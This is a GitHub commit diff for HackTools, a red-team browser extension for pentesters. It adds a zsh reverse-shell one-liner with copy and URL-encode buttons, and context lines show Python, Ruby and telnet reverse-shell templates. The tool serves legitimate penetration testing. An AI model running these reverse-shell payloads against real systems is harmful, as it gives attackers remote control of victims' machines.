Merge pull request #101 from goproslowyo/zsh-revshell

Add a ZSH Reverse Shell
LasCC · May 28, 2021 · d73df82 · d73df82
2 parents d020708 + 8812218
commit d73df82
Show file tree

Hide file tree

Showing 5 changed files with 35 additions and 6 deletions.
diff --git a/README.md b/README.md
@@ -2,7 +2,7 @@
   <img alt="logo_hack_tools" src="https://i.postimg.cc/GtLdZ2rZ/noun-Panama-hat-1454601.png" />
   <h1>Welcome to HackTools 🛠</h1>
   <p>
-    <img alt="Version" src="https://img.shields.io/badge/version-0.3.7-blue.svg?cacheSeconds=2592000&style=for-the-badge" />
+    <img alt="Version" src="https://img.shields.io/badge/version-0.3.8-blue.svg?cacheSeconds=2592000&style=for-the-badge" />
     <img alt="release" src="https://img.shields.io/github/v/release/LasCC/Hack-Tools?color=yellow&style=for-the-badge" />
     <a href="https://addons.mozilla.org/en-US/firefox/addon/hacktools" target="_blank">
       <img alt="mozilla" src="https://img.shields.io/amo/v/hacktools?color=purple&label=mozilla%20addons&logo=mozilla&style=for-the-badge" />

diff --git a/src/components/AboutUs.js b/src/components/AboutUs.js
@@ -66,6 +66,7 @@ export default (props) => (
 			<Paragraph> John Hammond </Paragraph> <Paragraph> The Noun Project </Paragraph>
 			<Paragraph> PayloadsAllTheThings </Paragraph>
 			<Paragraph> Fabien LOISON(flozz) for the p0wny @shell </Paragraph>
+			<Paragraph> GoProSlowYo for the zsh reverse shell </Paragraph>
 		</div>
 	</QueueAnim>
 );
diff --git a/src/components/LayoutApp.js b/src/components/LayoutApp.js
@@ -4,7 +4,7 @@ import { CopyrightCircleOutlined, FullscreenOutlined, ArrowsAltOutlined } from '
 import { createFromIconfontCN } from '@ant-design/icons';
 import { goTo } from 'react-chrome-extension-router';
 import ReverseShell from './Linux_Shell/ReverseShell';
-import PhpReverseShell from './Web/PhpReverseShell';
+import PhpReverseShell from './web/PhpReverseShell';
 import TtySpawnShell from './Linux_Shell/TtySpawnShell';
 import Base64Encode from './encoding/Base64Encode';
 import HexEncode from './encoding/HexEncode';
@@ -15,8 +15,8 @@ import LFI from './web/LFI';
 import XSS from './web/XSS';
 import SQLi from './web/SqlInjection';
 import AboutUs from './AboutUs';
-import FeedRSS from './RSS/FeedRSS';
-import FileTransfer from './File_Transfer/File_Transfer';
+import FeedRSS from './rss/FeedRSS';
+import FileTransfer from './file_transfer/File_transfer';
 import PersistedState from 'use-persisted-state';
 import MSFBuilder from './Linux_Shell/MSFBuilder';
 
@@ -198,7 +198,7 @@ export default (props) => {
 					<CopyrightCircleOutlined /> Hack Tools - The all in one Red team browser extension for web
 					pentesters
 					<Paragraph style={{ textAlign: 'center' }}>Ludovic COULON - Riadh BOUCHAHOUA</Paragraph>
-					<pre style={{ textAlign: 'center' }}>HackTools Version - 0.3.7</pre>
+					<pre style={{ textAlign: 'center' }}>HackTools Version - 0.3.8</pre>
 					<Button icon={<FullscreenOutlined style={{ margin: 5 }} />} type='link'>
 						<a href={target} rel='noreferrer noopener' target='_blank'>
 							Fullscreen mode

diff --git a/src/components/Linux_Shell/ReverseShell.js b/src/components/Linux_Shell/ReverseShell.js
@@ -33,6 +33,7 @@ export default (props) => {
 	const python_rshell = `python -c 'import sys,socket,os,pty;s=socket.socket()s.connect((os.getenv("${values.ip}"),int(os.getenv("${values.port}"))))[os.dup2(s.fileno(),fd) for fd in (0,1,2)]pty.spawn("/bin/sh")'`;
 	const ruby_rshell = `ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["${values.ip}"],ENV["${values.port}"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`;
 	const telnet_rshell = `TF=$(mktemp -u); mkfifo $TF && telnet ${values.ip} ${values.port} 0<$TF | /bin sh 1>$TF`;
+	const zsh_rshell = `zsh -c 'zmodload zsh/net/tcp && ztcp ${values.ip} ${values.port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'`
 
 	return (
 		<QueueAnim delay={300} duration={1500}>
@@ -95,6 +96,33 @@ export default (props) => {
 				</Clipboard>
 			</div>
 			<Divider dashed />
+			<div style={{ padding: 10, marginTop: 15 }} key='a'>
+				<Title level={3}>
+					Zsh <IconFont type='icon-command-line' />
+				</Title>
+				<Paragraph copyable editable ellipsis={true}>
+					{zsh_rshell}
+				</Paragraph>
+				<Clipboard component='a' data-clipboard-text={zsh_rshell}>
+					<Button
+						type='primary'
+						onClick={successInfoReverseShell}
+						style={{ marginBottom: 10, marginTop: 15 }}
+					>
+						<CopyOutlined /> Copy the reverse shell
+					</Button>
+				</Clipboard>
+				<Clipboard component='a' data-clipboard-text={encodeURI(zsh_rshell)}>
+					<Button
+						type='dashed'
+						onClick={successInfoEncodeURL}
+						style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
+					>
+						<LinkOutlined /> URL encoded
+					</Button>
+				</Clipboard>
+			</div>
+			<Divider dashed />
 			<div style={{ padding: 10, marginTop: 15 }} key='b'>
 				<Title level={3}>
 					Netcat <IconFont type='icon-command-line' />

diff --git a/src/manifest.json b/src/manifest.json
@@ -1,6 +1,6 @@
 {
 	"name": "Hack-Tools",
-	"version": "0.3.7",
+	"version": "0.3.8",
 	"description": "The all in one Red team extension for web pentester",
 	"browser_action": {
 		"default_title": "Hack-Tools",